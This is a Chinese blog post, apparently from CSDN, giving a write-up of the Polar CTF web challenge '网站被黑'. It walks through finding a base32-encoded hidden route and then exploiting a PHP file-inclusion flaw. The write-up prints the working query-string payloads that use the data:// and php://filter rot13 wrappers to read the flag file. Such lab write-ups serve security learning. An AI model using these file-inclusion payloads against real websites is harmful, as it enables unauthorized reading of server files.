Polar 网站被黑

最新推荐文章于 2024-06-13 15:01:36 发布
最新推荐文章于 2024-06-13 15:01:36 发布
阅读量278 收藏
点赞数 2
分类专栏: CTF-web(零散wp合集) 文章标签: Web安全 WriteUp 网络安全 Polar CTF php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/139047565
版权

Polar 网站被黑

开题,挺好看的前端,可惜啥也没有。

image-20231206155928020

信息搜集一波,扫目录出现几个敏感目录,但是没什么用。

image-20231206160525481

继续搜集,在返回包中发现了HINT

image-20231206161103735

F5XDAXZQNZSV6ZRRNZSF63JTF4======base32解码后是一个路由/n0_0ne_f1nd_m3/,访问,结果如下。

image-20231206161314224

文件包含漏洞,flag应该在注释提示的imposible.php文件中。

绕过第一个if,data://协议和php://input协议都可以用

payload 1:

?text=data://text/plain,welcome to the 504sys

image-20231206164005774

绕过第二个if,只需要能读文件即可。

payload 2:

file=php://filter/read=string.rot13/resource=imposible.php

image-20231206170059656

最后payload:

?text=data://text/plain,welcome to the 504sys&file=php://filter/read=string.rot13/resource=imposible.php

rot13后的flag再次rot13一次还原

image-20231206170333601

Jay 17
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
polar CTF web掉的站
samRsa
01-02 570
polar CTF web掉的站 看到shell.php和index.php.bak。一看就是爆破,字典都给了,最后得到为。1、dirsearch 扫目录。
mysql 数据库被_数据库被
weixin_34980267的博客
01-19 142
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
mysql 被恢复_数据库被怎么恢复
weixin_35828338的博客
01-19 467
{"moduleinfo":{"card_count":[{"count_phone":1,"count":1}],"search_count":[{"count_phone":4,"count":4}]},"card":[{"des":"阿里云数据库专家保驾护航,为用户的数据库应用系统进行性能和风险评估,参与配合进行数据压测演练,提供数据库优化方面专业建议,在业务高峰期与用户共同保障数据库系统平...
polarctf靶场【web】login、被掉的站、GET-POST、网站、robots
m0_73981089的博客
04-26 622
sal查询,bp爆破,目录扫描,get-post简单传参
Polar Web 【简单】- 被掉的站
AlanKSorata的博客
06-03 298
记录本题旨在记录针对已攻陷站点的基本思路,以及密码爆破脚本的编写思路
polar靶场通关笔记
weixin_43296565的博客
06-06 4864
这里是关于自己打polar靶场的小笔记
PolarD&N_CTF_WEB_被掉的站
weixin_62626298的博客
10-12 204
1.首先进网站看一下i提示说现在站中还有很多马我们用kali中dirsearch来扫描一下本站目录可以看出现在站中有一个bak备份文件和一个shell.php的木马先访问一下shell.php是一个登录网页随便输入密码,打开bp抓包看一下传递了一个参数pass再打开备份文件看一下好像是一个密码字典,使用bp爆破一下试试攻击后得到flag。
WEB_被掉的站
ASDAW2的博客
10-15 104
Polar靶场WEB方向被掉的站
python polar contour_Halcon极坐标转换,图文解说,含点坐标的转换
weixin_39606177的博客
12-04 365
极坐标的用途把圆形的图片转换为矩形,便于字符识别和关键区域的提取。在halcon中对应的算子(1)极坐标的展开:polar_trans_image_ext(Image : PolarTransImage : Row, Column, AngleStart, AngleEnd, RadiusStart, RadiusEnd, Width, Height, Interpolation : )(2)极坐...
polar代码MATLAB (1).rar_Matlab代码_Polar码_polar_polar coding_sc译码
07-14
该部分的主要功能是完成polar码的信道选择,编码和SC译码的matlab代码。
GA.zip_GA_polar_polar code_信道极化_高斯近似算法
07-13
极化编码的信道挑选算法,高斯近似算法,matlab
polar code.zip_Polar码_polar码 BEC信道_删除信道_极化码_极化码编码
07-14
着重对极化码编码时涉及的信道选择技术进行展开研究。在二进制删除信道(BEC)环境下,利用Bhattacharyya参数分别从信道转移概率和码长的两方面说明对信道选择的影响。
vim-polar:白色背景vim colorscheme
05-09
POLAR:vim colorscheme 使用很棒的构建 没有花哨的背景,纯白色在这里。 除“标题”和“目录”为粗体外,没有使用粗体或斜体的语法。 简单的。 您要浅色的背景吗? 检查。 你喜欢色背景吗? 检查 。 你喜欢...
OpenCV例程汇总.doc
01-25
图像反转(就是把的变白,白的变) 11 图像格式的转换 12 从摄像头或者AVI文件中得到视频流,对视频流进行边缘检测 14 采用Canny算子进行边缘检测 15 角点检测 18 图像的旋转加缩放(效果很拽,用地球做就像谷歌...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
1. NAS和SAN存储
最新发布
u010198709的博客
06-13 463
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 306
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 882
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
pie3D怎么把饼图设置成白灰色
05-20
coord_polar(theta = "y") + theme_void() # 将图表主题设置为白主题 pie_chart () # 将填充颜色设置为灰色调 pie_chart () # 显示图表 pie_chart ``` 在这个示例中,我们首先创建了一个基本的pie3D图表,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值